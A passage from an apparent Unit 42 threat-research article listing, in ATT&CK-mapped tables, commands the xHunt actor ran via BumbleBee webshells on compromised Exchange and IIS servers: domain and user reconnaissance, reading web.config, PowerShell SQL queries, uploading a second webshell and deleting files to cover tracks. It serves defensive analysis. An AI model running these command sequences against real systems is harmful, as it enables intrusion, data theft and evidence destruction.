| 16:23:07                    | dir \\\<redacted IP #1\>\\C$\\windows\\temp\\\*.txt                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:23:16                    | type \\\<redacted IP #1\>\\C$\\windows\\temp\\teredo.txt                                                                                                                                                                                                                   | [T1039](https://attack.mitre.org/techniques/T1039/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:23:27                    | del \\\<redacted IP #1\>\\C$\\windows\\temp\\ww.txt                                                                                                                                                                                                                        | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 16:23:29                    | del \\\<redacted IP #1\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                         | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 16:23:43                    | net use \* /DELETE /y                                                                                                                                                                                                                                                      | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 17:21:19                    | del owafont\_ja.aspx /F                                                                                                                                                                                                                                                     | [T1505.003](https://attack.mitre.org/techniques/T1505/003/),[T1070.004](https://attack.mitre.org/techniques/T1070/004/)                                                                                                          |

^*Table 2. Commands the actor ran using BumbleBee webshell on the compromised Exchange server.*^

#### **Commands Executed via BumbleBee on IIS Web Server**

|------------------|-----------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **Time**         | **Webshell Filename** | **Command**                                                                                                                                                                                                                                                                                                                                                                              | **ATT\&CK TIDs**                                                                                                                                                     |
| 9/10/20 20:47:36 | ShowDoc.aspx          | hostname \& whoami \& ipconfig/all \& route print \& arp -a                                                                                                                                                                                                                                                                                                                              | [T1082](https://attack.mitre.org/techniques/T1082/),  [T1033](https://attack.mitre.org/techniques/T1033/), [T1016](https://attack.mitre.org/techniques/T1016/) |
| 9/10/20 20:48:03 | ShowDoc.aspx          | ping -n 1 -a \<redacted IP\>                                                                                                                                                                                                                                                                                                                                                             | [T1018](https://attack.mitre.org/techniques/T1018/)                                                                                                                  |
| 9/10/20 20:48:20 | ShowDoc.aspx          | ping -n 1 -a \<redacted domain\>                                                                                                                                                                                                                                                                                                                                                         | [T1018](https://attack.mitre.org/techniques/T1018/)                                                                                                                  |
| 9/10/20 20:48:29 | ShowDoc.aspx          | net users /domain                                                                                                                                                                                                                                                                                                                                                                        | [T1087.002](https://attack.mitre.org/techniques/T1087/002/)                                                                                                          |
| 9/10/20 20:48:33 | ShowDoc.aspx          | ipconfig/all                                                                                                                                                                                                                                                                                                                                                                             | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                  |
| 9/10/20 20:49:19 | ShowDoc.aspx          | echo %USERDOMAIN%                                                                                                                                                                                                                                                                                                                                                                        | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                  |
| 9/10/20 20:49:27 | ShowDoc.aspx          | net users /domain                                                                                                                                                                                                                                                                                                                                                                        | [T1087.002](https://attack.mitre.org/techniques/T1087/002/)                                                                                                          |
| 9/10/20 20:49:35 | ShowDoc.aspx          | net users                                                                                                                                                                                                                                                                                                                                                                                | [T1087.001](https://attack.mitre.org/techniques/T1087/001/)                                                                                                          |
| 9/10/20 20:49:44 | ShowDoc.aspx          | net localgroup administrators                                                                                                                                                                                                                                                                                                                                                            | [T1087.001](https://attack.mitre.org/techniques/T1087/001/)                                                                                                          |
| 9/10/20 20:50:16 | ShowDoc.aspx          | net view                                                                                                                                                                                                                                                                                                                                                                                 | [T1135](https://attack.mitre.org/techniques/T1135/)                                                                                                                  |
| 9/10/20 20:50:21 | ShowDoc.aspx          | type ..\\..\\web.config                                                                                                                                                                                                                                                                                                                                                                  | [T1005](https://attack.mitre.org/techniques/T1005/)                                                                                                                  |
| 9/10/20 20:50:40 | ShowDoc.aspx          | \*\* Uploads cq.aspx webshell \*\*                                                                                                                                                                                                                                                                                                                                                       | [T1505.003](https://attack.mitre.org/techniques/T1505/003/)                                                                                                          |
| 9/10/20 20:51:16 | cq.aspx               | powershell -C "$conn=new-object System.Data.SqlClient.SQLConnection("""\<redacted SQL connection\>""");Try { $conn.Open(); }Catch { continue; }$cmd = new-object System.Data.SqlClient.SqlCommand("""select @@version;""",$conn);$ds=New-Object system.Data.DataSet;$da=New-Object system.Data.SqlClient.SqlDataAdapter($cmd);\[void\]$da.fill($ds);$ds.Tables\[0\];$conn.Close();"      | [T1059.001](https://attack.mitre.org/techniques/T1059/001/),  [T1213](https://attack.mitre.org/techniques/T1213/)                                              |
| 9/10/20 20:51:37 | cq.aspx               | powershell -C "$conn=new-object System.Data.SqlClient.SQLConnection("""\<redacted SQL connection\>""");Try { $conn.Open(); }Catch { continue; }$cmd = new-object System.Data.SqlClient.SqlCommand("""\<redacted SQL query\>""",$conn);$ds=New-Object system.Data.DataSet;$da=New-Object system.Data.SqlClient.SqlDataAdapter($cmd);\[void\]$da.fill($ds);$ds.Tables\[0\];$conn.Close();" | [T1059.001](https://attack.mitre.org/techniques/T1059/001/),[T1213](https://attack.mitre.org/techniques/T1213/)                                                      |
| 9/10/20 20:51:45 | cq.aspx               | powershell -C "$conn=new-object System.Data.SqlClient.SQLConnection("""\<redacted SQL connection\>""");Try { $conn.Open(); }Catch { continue; }$cmd = new-object System.Data.SqlClient.SqlCommand("""\<redacted SQL query\>""",$conn);$ds=New-Object system.Data.DataSet;$da=New-Object system.Data.SqlClient.SqlDataAdapter($cmd);\[void\]$da.fill($ds);$ds.Tables\[0\];$conn.Close();" | [T1059.001](https://attack.mitre.org/techniques/T1059/001/),[T1213](https://attack.mitre.org/techniques/T1213/)                                                      |
| 9/10/20 20:52:27 | ShowDoc.aspx          | del cq.aspx                                                                                                                                                                                                                                                                                                                                                                              | [T1070.004](https://attack.mitre.org/techniques/T1070/004/)                                                                                                          |

^*Table 3. Commands the actor ran using BumbleBee webshell hosted at second Kuwaiti organization.*^
Back to top

### Tags

* [BumbleBee](https://unit42.paloaltonetworks.com/tag/bumblebee/ "BumbleBee")
* [Remote desktop](https://unit42.paloaltonetworks.com/tag/remote-desktop/ "remote desktop")
* [Webshell](https://unit42.paloaltonetworks.com/tag/webshell/ "webshell")
* [XHunt](https://unit42.paloaltonetworks.com/tag/xhunt/ "xHunt")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: TA551: Email Attack Campaign Switches from Valak to IcedID](https://unit42.paloaltonetworks.com/ta551-shathak-icedid/ "TA551: Email Attack Campaign Switches from Valak to IcedID")

### Table of Contents

* 

### Related Articles

* [Threat Assessment: Howling Scorpius (Akira Ransomware)](https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/ "article - table of contents")
* [Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples](https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movement-macos/ "article - table of contents")
* [Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)](https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")  
  ![Pictorial representation of Token-jacking. A person types on a laptop with multiple digital interface elements projected, including an "AI" icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1246251272-2-786x369.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 6, 2026 [#### Token Jacking: Cybercriminals Could Be Stealing Your AI Resources](https://unit42.paloaltonetworks.com/ai-token-jacking/)

* [AI API](https://unit42.paloaltonetworks.com/tag/ai-api/ "AI API")

* [AI gateway](https://unit42.paloaltonetworks.com/tag/ai-gateway/ "AI gateway")

* [API keys](https://unit42.paloaltonetworks.com/tag/api-keys/ "API keys")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-token-jacking/ "Token Jacking: Cybercriminals Could Be Stealing Your AI Resources")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
